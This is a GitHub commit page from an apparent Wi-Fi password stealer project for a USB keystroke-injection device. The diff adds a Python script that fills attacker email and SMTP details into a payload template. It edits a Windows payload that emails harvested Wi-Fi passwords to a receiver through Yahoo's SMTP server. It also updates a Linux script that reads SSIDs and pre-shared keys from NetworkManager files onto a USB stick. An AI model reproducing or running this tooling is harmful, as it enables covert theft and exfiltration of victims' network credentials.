Skip to content

Commit

Permalink
Merge pull request #2 from AleksaMCode/feat/payload-writer
Browse files Browse the repository at this point in the history
Feat/payload writer
  • Loading branch information
AleksaMCode authored Sep 26, 2023
2 parents 2129330 + 446c2f6 commit 25cf7c5
Show file tree
Hide file tree
Showing 4 changed files with 112 additions and 5 deletions.
12 changes: 10 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@
- [Quick overview of the payload](#quick-overview-of-the-payload)
- [Exfiltrated data formatting](#exfiltrated-data-formatting)
- [USB Mass Storage Device Problem](#usb-mass-storage-device-problem)
- [Payload Writer](#payload-writer)
- [Limitations/Drawbacks](#limitationsdrawbacks)
- [To-Do List](#to-do-list)

Expand Down Expand Up @@ -114,10 +115,10 @@ https://github.com/AleksaMCode/WiFi-password-stealer/blob/a90ffb208e6a09d1b0ae44
<p align="justify">In order to run the <a href="https://github.com/AleksaMCode/WiFi-password-stealer/blob/main/scripts/wifi_passwords_print.sh"><code>wifi_passwords_print.sh</code></a> script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:</p>

```bash
echo PASSWORD | sudo -S sh wifi_passwords_print.sh
echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK
```

where `PASSWORD` is your account's password.
where `PASSWORD` is your account's password and `USBSTICK` is the name for your USB device.

#### Quick overview of the payload
<p align="justify"><b>NetworkManager</b> is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses <code>.ini-style</code> keyfile format and stores network configuration profiles. The <b>keyfile</b> is a plugin that supports all the connection types and capabilities that <b>NetworkManager</b> has. The files are located in <i>/etc/NetworkManager/system-connections/</i>. Based on the <b>keyfile</b> format, the payload uses the <code>grep</code> command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used (<code>(?<=keyword)</code>). While the positive lookbehind assertion will match at a certain position in the string, <a href="https://en.wikipedia.org/wiki/Viz.">sc.</a> at a position right after the <i>keyword</i> without making that text itself part of the match, the regex <code>(?<=keyword).*</code> will match any text after the <i>keyword</i>. This allows the payload to match the values after <b>SSID</b> and <b>psk</b> (<a href="https://en.wikipedia.org/wiki/Pre-shared_key">pre-shared key</a>) keywords.</p>
Expand All @@ -141,6 +142,13 @@ https://github.com/AleksaMCode/WiFi-password-stealer/blob/f5b3b11328764eb07d765a
> <li>Don't solder the pins because you will probably want to change/update the payload at some point.</li>
> </ul>
## Payload Writer
<p align="justify">When creating a functioning payload file, you can use the <code>writer.py</code> script, or you can manually change the template file. In order to run the script successfully you will need to pass in addition to the script wile name, a name of the OS (<i>windows</i> or <i>linux</i>) and the name of the payload file (e.q. <i>payload.dd</i>). Below you can find an example how to run the script when creating a Windows payload.</p>

```bash
python3 writer.py windows payload.dd
```

## Limitations/Drawbacks
<ul>
<li><p align="justify"><s>This pico-ducky currently works only on Windows OS.</p></s></li>
Expand Down
2 changes: 1 addition & 1 deletion payload/payload_windows.template.dd
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@ STRING Format-Table -AutoSize
ENTER
STRING Out-File -FilePath .\wifi_pass.txt -InputObject $res -Encoding ASCII -Width 50
ENTER
STRING Send-MailMessage -To RECEIVER_EMAIL -from SENDER_EMAIL -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL, $(PASSWORD | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587
ENTER
DELAY 500
STRING Remove-Item .\wifi_pass.txt
Expand Down
99 changes: 99 additions & 0 deletions payload/writer.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
import sys

ARGS = sys.argv[1:]
SYSTEM_LIST = ["windows", "linux"]


def windows_writer():
payload = []
try:
payload = open(ARGS[1], 'r').readlines()
SMTP_SERVER = "smtp.mail.yahoo.com"
SMTP_PORT = 587
EMAIL_SUBJECT = "Stolen data from PC"
EMAIL_BODY = "Exploited data is stored in the attachment."

value = input(f"Select a SMTP server (default '{SMTP_SERVER}'): ")
if value == "":
value = SMTP_SERVER
payload[30] = payload[30].replace("SMTP_SERVER", value)

value = input(f"Select a SMTP server port (default '{SMTP_PORT}'): ")
if value == "":
value = SMTP_PORT
payload[30] = payload[30].replace("SMTP_PORT", value)

done = False
while not done:
value = input(f"Select a SMTP server password: ")
if value != "":
payload[30] = payload[30].replace("SMTP_PASSWORD", value)
done = True

done = False
while not done:
value = input(f"Select a SMTP server email: ")
if value != "":
payload[30] = payload[30].replace("SENDER_EMAIL", value)
done = True

done = False
while not done:
value = input(f"Select a receiver email: ")
if value != "":
payload[30] = payload[30].replace("RECEIVER_EMAIL", value)
done = True

value = input(f"Select an email subject (default '{EMAIL_SUBJECT}'): ")
if value == "":
value = EMAIL_SUBJECT
payload[30] = payload[30].replace("EMAIL_SUBJECT", value)

value = input(f"Select an email body (default '{EMAIL_BODY}'): ")
if value == "":
value = EMAIL_BODY
payload[30] = payload[30].replace("EMAIL_BODY", value)
except FileNotFoundError:
exit(f"File '{ARGS[1]}' is missing.")

with open(ARGS[1], 'w') as f:
for line in payload:
f.write(line)


def linux_writer():
payload = []

try:
payload = open(ARGS[1], 'r').readlines()

done = False
while not done:
value = input(f"Select you password: ")
if value != "":
payload[6] = payload[6].replace("PASSWORD", value)
payload[8] = payload[8].replace("PASSWORD", value)
done = True

done = False
while not done:
value = input(f"Select you USB stick name: ")
if value != "":
payload[2] = payload[2].replace("USBSTICK", value)
payload[10] = payload[10].replace("USBSTICK", value)
done = True
except FileNotFoundError:
exit(f"File '{ARGS[1]}' is missing.")

with open(ARGS[1], 'w') as f:
for line in payload:
f.write(line)


if not ARGS or len(ARGS) != 2 or ARGS[0] not in SYSTEM_LIST:
exit("Unknown system argument(s) used.")

if ARGS[0] == SYSTEM_LIST[0]:
windows_writer()
else:
linux_writer()
4 changes: 2 additions & 2 deletions scripts/wifi_passwords_print.sh
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#!/bin/bash
echo "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt
echo "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/$1/wifi_pass.txt

for FILE in /etc/NetworkManager/system-connections/*
do
echo "$(cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(cat "$FILE" | grep -oP '(?<=psk=).*')"
done >> /media/$(hostname)/USBSTICK/wifi_pass.txt
done >> /media/$(hostname)/$1/wifi_pass.txt

0 comments on commit 25cf7c5

Please sign in to comment.